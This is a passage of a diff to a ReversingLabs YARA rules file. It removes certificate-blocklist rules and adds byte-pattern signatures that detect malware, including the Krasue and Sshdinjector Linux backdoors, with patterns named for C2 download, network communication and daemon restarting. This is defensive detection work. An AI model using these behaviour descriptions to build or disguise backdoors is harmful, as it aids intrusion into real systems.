+            24 ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 49 8B CF
+            FF D0 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ??
+            ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ??
+            ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ??
+            ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 45 33 C0 48 89 4C 24 ?? 4C 8D 4C 24 ??
+            48 8D 4C 24 ?? BA ?? ?? ?? ?? 48 89 4C 24 ?? 49 8B CF FF D0 85 C0 0F 84 ?? ?? ?? ??
+            8B 5C 24 ?? FF 15 ?? ?? ?? ?? 44 8B C3 BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48
+            8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 90 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8
+            ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8
+            ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ??
+            ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 54 24 ?? 49 8B CF FF D0 85 C0 0F 84 ?? ??
+            ?? ?? 44 8B 74 24 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48
+        }
+		$download_data_from_c2_p3 = {
+            8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48
+            8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85
+            C0 0F 84 ?? ?? ?? ?? 4C 8D 4C 24 ?? 45 8B C6 48 8B D6 49 8B CF FF D0 85 C0 74 ?? 44
+            8B 74 24 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48
+            85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48
+            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0 74 ??
+            4C 8D 4C 24 ?? 48 89 7C 24 ?? 45 8B C6 48 8B D6 49 8B CC FF D0 85 C0 74 ?? 39 7C 24
+            ?? 0F 87 ?? ?? ?? ?? BF ?? ?? ?? ?? 4C 8B 7C 24 ?? 48 8D 4C 24 ?? 44 8B F7 E8 ?? ??
+            ?? ?? 4D 85 E4 74 ?? 49 83 FC ?? 74 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8
+            E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8
+            E8 ?? ?? ?? ?? 48 8B F8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CF E8 ??
+            ?? ?? ?? 41 8B FE 48 85 C0 74 ?? 49 8B CC FF D0 4D 85 FF 74 ?? FF 15 ?? ?? ?? ?? 4D
+            8B C7 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ??
+            ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 85 F6
+            74 ?? FF 15 ?? ?? ?? ?? 4C 8B C6 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 8B C7 48 8B 8D ??
+            ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F 5E 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BUSTER ASSISTENCIA TECNICA ELETRONICA LTDA - ME" and pe.signatures [ i ] . serial == "0a:38:9b:95:ee:73:6d:d1:3b:c0:ed:74:3f:d7:4d:2f" and 1351814399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $decrypt_configuration_p* ) ) and ( $decryption_algorithm ) and ( all of ( $request_access_token_p* ) ) and ( all of ( $network_communication_p* ) ) and ( all of ( $download_data_from_c2_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1A3Faaeb3A8B93B2394Fec36345996E6 : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Krasue : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Krasue backdoor."
 		author = "ReversingLabs"
-		id = "343e4dbe-21a6-5758-be81-e5e7918c54fa"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "3187eebf-ef70-585f-85cf-5813025c785e"
+		date = "2024-03-04"
+		modified = "2024-03-04"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L657-L673"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a3bd9aaba8dbdb340b5d3013684584524eb08b11339985ba6ca0291b8c8bc692"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Linux.Backdoor.Krasue.yara#L1-L127"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e2daa35ef9e0793062c9fb3bd8e4838e1e81ee3d228d8117b1c3b0e72eb8e151"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Krasue"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "salvatore macchiarella" and pe.signatures [ i ] . serial == "1a:3f:aa:eb:3a:8b:93:b2:39:4f:ec:36:34:59:96:e6" and 1468454400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_1A35Acce5B0C77206B1C3Dc2A6A2417C : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "0e42ffb8-07f2-55e4-977d-7760e923d76d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L675-L691"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ce161fdd511e0efa042516ead09c6ab5f8dcf54f2087cdccbfed8e7cdfbd25b2"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$switch_server = {
+            8B 05 ?? ?? ?? ?? FF C0 3B 05 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 7C ?? C7 05 ?? ?? ?? ??
+            ?? ?? ?? ?? 48 63 05 ?? ?? ?? ?? 85 C0 75 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B
+            15 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ??
+            ?? 89 15 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 66 89 15 ?? ?? 23 00 48 8B 04 C5 ?? ?? ?? ??
+            66 C7 05 ?? ?? 23 00 ?? ?? 8B 10 89 15 ?? ?? ?? ?? 66 8B 40 ?? 66 89 05 ?? ?? 23 00
+            C3
+        }
+		$get_hostname = {
+            41 55 41 54 31 F6 55 53 31 C0 BF ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
+            C0 0F 88 ?? ?? ?? ?? 48 89 E6 89 C7 89 C3 E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 45 31 C9 31
+            FF 41 89 D8 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 41 89 EC 48 63 ED 48 89 EE E8 ?? ?? ?? ??
+            BE ?? ?? ?? ?? 48 89 C7 49 89 C5 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 48 63 D0 49 8D 74 15
+            ?? 8D 50 ?? 48 63 D2 44 39 E2 41 89 D0 7D ?? 48 FF C2 41 80 7C 15 ?? ?? 75 ?? 44 89
+            C1 41 FF C8 BA ?? ?? ?? ?? 29 C1 4D 63 C0 48 89 D7 83 E9 ?? 48 63 C9 F3 A4 41 C6 80
+            ?? ?? ?? ?? ?? 4C 89 EF 48 89 EE E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 48 81 C4 ?? ??
+            ?? ?? 5B 5D 41 5C 41 5D C3
+        }
+		$start_server_p1 = {
+            41 57 41 56 31 D2 41 55 41 54 BE ?? ?? ?? ?? 55 53 89 FB BF ?? ?? ?? ?? 48 81 EC ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 89 05 ?? ?? ?? ?? 79 ?? 83 CF ?? E9 ?? ?? ?? ?? 48 8D
+            4C 24 ?? 41 B8 ?? ?? ?? ?? BE ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C7 C7 44 24 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 48 89 D7 F3 AB 31 FF 66 C7 05
+            ?? ?? 23 00 ?? ?? E8 ?? ?? ?? ?? 0F B7 FB 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ??
+            ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 66 89 05 ?? ?? 23 00 E8 ?? ?? ?? ?? 85 C0 78
+            ?? 4C 8D A4 24 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 8D 74 24 ?? C7 05 ?? ?? ?? ??
+            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 31 C9 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ??
+            ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 48 89 C3 0F 88 ?? ?? ?? ?? 31 C0 B9 ?? ?? ??
+            ?? 4C 89 E7 83 FB ?? F3 AB 7E ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ??
+            ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 44 8D 08 31 C9 BA
+            ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 83 FB ?? 75 ?? BE ?? ?? ?? ?? 4C 89
+            E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 05 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 05
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 DA BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E6 89
+            C2 8A 06 89 F5 44 29 E5 3C ?? 75 ?? 80 7E ?? ?? 75 ?? 48 83 C6 ?? EB ?? 3C ?? 75 ??
+            80 7E ?? ?? 75 ?? 41 B8 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 4C 89 C7 4C 8B 05 ?? ?? ??
+            ?? F3 AB 8B 7E ?? 66 8B 4E ?? 4C 89 06 C6 06 ?? 45 31 C0 C6 46 ?? ?? BE
+        }
+		$start_server_p2 = {
+            66 C7 05 ?? ?? 23 00 ?? ?? 89 3D ?? ?? ?? ?? 66 89 0D ?? ?? 23 00 89 3D ?? ?? ?? ??
+            66 89 0D ?? ?? 23 00 48 89 F7 B9 ?? ?? ?? ?? 4C 89 E6 F3 AB E9 ?? ?? ?? ?? 85 ED 75
+            ?? 48 63 DD BA ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 01 E3 48 89 DF E8 ?? ?? ?? ?? 85 C0 75
+            ?? 48 8D 7B ?? E8 ?? ?? ?? ?? 6B C0 ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 EF 99 F7
+            F9 31 C0 E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 48 8D 54 24 ?? 48 98 85 C0 78 ?? 49 8B 0C 04
+            48 83 C2 ?? 48 83 E8 ?? 48 89 4A ?? C6 42 ?? ?? C6 42 ?? ?? EB ?? BA ?? ?? ?? ?? BE
+            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 05 ?? ?? ?? ?? 89 E9 4C 89 F6
+            89 2D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? B8 ?? ?? ?? ??
+            48 89 C7 F3 A4 BE ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 31 C0 48 83 C9 ?? 4C 89 EF F2
+            AE 48 89 C8 48 F7 D0 48 8D 50 ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89
+            DF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 44 8B 0D ?? ?? ?? ?? 44
+            8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 4C 24 ?? 44 89 4C 24 ?? E8 ?? ?? ?? ?? 48 83
+            EC ?? 41 89 C0 BA ?? ?? ?? ?? 8B 4C 24 ?? 4C 89 EF BE ?? ?? ?? ?? 31 C0 51 8B 0D ??
+            ?? ?? ?? 41 57 53 44 8B 4C 24 ?? E8 ?? ?? ?? ?? 31 C0 48 83 C9 ?? 4C 89 EF F2 AE 48
+            83 C4 ?? 48 89 C8 48 F7 D0 48 8D 50 ?? 41 89 E8 4C 89 F1 4C 89 EE 8B 3D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8
+        }
+		$start_server_p3 = {
+            85 C0 75 ?? 31 FF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ??
+            ?? 85 C0 75 ?? BF ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ??
+            ?? ?? 85 C0 75 ?? BF ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 89 C7 E8 ?? ?? ?? ?? 45 85 FF 0F
+            85 ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 41 89 C4 75 ?? 8B
+            7C 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? BE ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8D 4B ?? 45 31 C0 BA ?? ?? ??
+            ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? E8
+            ?? ?? ?? ?? 8B 7C 24 ?? 48 8D B4 24 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            89 C3 7E ?? 4C 8D AC 24 ?? ?? ?? ?? 8D 04 2B 3D ?? ?? ?? ?? 7E ?? 8B 3D ?? ?? ?? ??
+            BA ?? ?? ?? ?? 48 8D 4C 24 ?? 4C 89 EE 29 EA 41 89 E8 49 81 C5 ?? ?? ?? ?? 81 EB ??
+            ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 48 8D 4C 24 ?? 41 89 E8 89 DA 4C 89
+            EE E8 ?? ?? ?? ?? EB ?? 31 F6 BA ?? ?? ?? ?? 44 89 E7 E8 ?? ?? ?? ?? 85 C0 0F 85
+        }
+		$send_encrypt = {
+            E8 ?? ?? ?? ?? 41 8D 7E ?? 49 89 C5 48 63 FF E8 ?? ?? ?? ?? 48 63 54 24 ?? 48 89 C7
+            4C 89 FE 48 8D 0C 13 C6 04 08 ?? 89 D1 48 01 C2 F3 A4 48 89 D7 48 89 EE 48 89 D9 44
+            89 F2 F3 A4 48 89 C6 EB ?? 8D 7B ?? 48 63 FF E8 ?? ?? ?? ?? 89 DA 49 89 C5 48 89 EE
+            4C 89 EF E8 ?? ?? ?? ?? 44 8B 0D ?? ?? ?? ?? 4C 89 EE 44 89 E7 48 63 D0 41 B8 ?? ??
+            ?? ?? 31 C9 E8 ?? ?? ?? ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
+		$notify_server = {
+            48 81 EC ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 48 89 E0 85 D2 7E ?? BE ?? ?? ?? ?? 89 D1 48
+            89 E7 F3 A4 48 63 D2 BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 4C 8D 04 10 41 B9 ?? ?? ?? ?? 48
+            83 C2 ?? 4C 89 C7 41 B8 ?? ?? ?? ?? F3 A4 8B 3D ?? ?? ?? ?? 48 89 C6 E8 ?? ?? ?? ??
+            8B 05 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "cd ingegneri associati srl" and pe.signatures [ i ] . serial == "1a:35:ac:ce:5b:0c:77:20:6b:1c:3d:c2:a6:a2:41:7c" and 1166054399 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( $switch_server ) and ( $get_hostname ) and ( all of ( $start_server_p* ) ) and ( $send_encrypt ) and ( $notify_server )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_6Eb40Ea11Eaac847B050De9B59E25Bdc : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Sshdinjector : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Sshdinjector backdoor."
 		author = "ReversingLabs"
-		id = "e9f94ae9-0158-5789-b4d2-88f750442274"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "781d7a64-0908-5aa8-a178-cffe52e78036"
+		date = "2025-03-27"
+		modified = "2025-03-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L693-L709"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d0e7ab78fb42c9a8f19cba8e6a8b15d584651a23f1088e1f311589d46145e963"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/backdoor/Linux.Backdoor.Sshdinjector.yara#L1-L197"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "9370b59a3317ac14b5791723411216315e480fad7419d248aaed42a19312da0c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Sshdinjector"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "My Free Internet Update" and pe.signatures [ i ] . serial == "6e:b4:0e:a1:1e:aa:c8:47:b0:50:de:9b:59:e2:5b:dc" and 1062201599 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_6724340Ddbc7252F7Fb714B812A5C04D : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "2b61de88-9fea-5c3f-a7ab-db91e90b4965"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L711-L727"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bc72c2ca5f81198684233e23260831da5b9ef4e7ac5a25abbdb303eecc38bd53"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$kill_and_restart_daemons_p1 = {
+            55 48 89 E5 48 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 8D 55
+            ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 D7 F3 48 AB 48 89 FA 89 02 48 83 C2 ?? 48 8D
+            95 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 D7 F3 48 AB 48 89 FA 89 02 48 83
+            C2 ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7
+            40 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
+            89 C1 BA ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C6 48 8B 05 ?? ?? ?? ?? 48 89 C7 E8
+            ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 48
+            8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 48 8B 05 ??
+            ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 48 8D 85 ??
+            ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74
+        }
+		$kill_and_restart_daemons_p2 = {
+            48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? 48
+            8B 05 ?? ?? ?? ?? 48 89 C6 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
+            48 89 C6 48 8D 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48
+            89 C7 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 94 C0 84 C0 0F 84 ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 81 7D
+            ?? ?? ?? ?? ?? 0F 9E C0 84 C0 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 48 8D 45
+            ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7
+            E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? C9 C3
+        }
+		$network_communication_p1 = {
+            55 48 89 E5 41 54 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ??
+            ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8D 78 ?? E8 ?? ?? ?? ?? 48 8D 50 ?? 48 8B 05 ??
+            ?? ?? ?? 48 8D 04 02 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 66 89 45 ?? 48
+            8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 83 C0 ?? 48 03 45 ?? 48 89 45 ?? 48 8B 45 ?? 48
+            89 C7 E8 ?? ?? ?? ?? 66 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 83 C0 ?? 48
+            03 45 ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 C2 48 8B 05 ?? ?? ?? ??
+            66 89 10 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8D
+            71 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 0F B7 00 0F B7 C8 0F B7 55 ?? 0F
+            B7 45 ?? 41 89 C8 89 D1 89 C2 48 8B 05 ?? ?? ?? ?? 48 8D 70 ?? 48 8D 3D ?? ?? ?? ??
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05
+            ?? ?? ?? ?? 0F B7 00 66 85 C0 0F 84 ?? ?? ?? ?? 44 0F B7 65 ?? 0F B7 5D ?? 48 8D 45
+            ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 45 ?? 48 89 CE 48
+        }
+		$network_communication_p2 = {
+            89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 4C 8D 05 ?? ?? ?? ?? B9 ?? ?? ?? ?? 44 89 E2 89 DE
+            48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 89 D3
+            49 89 C4 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 EB ?? 89 D3 49 89 C4
+            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E0 48 63 D3 48 89 C7 E8 ?? ?? ?? ?? 48 8D
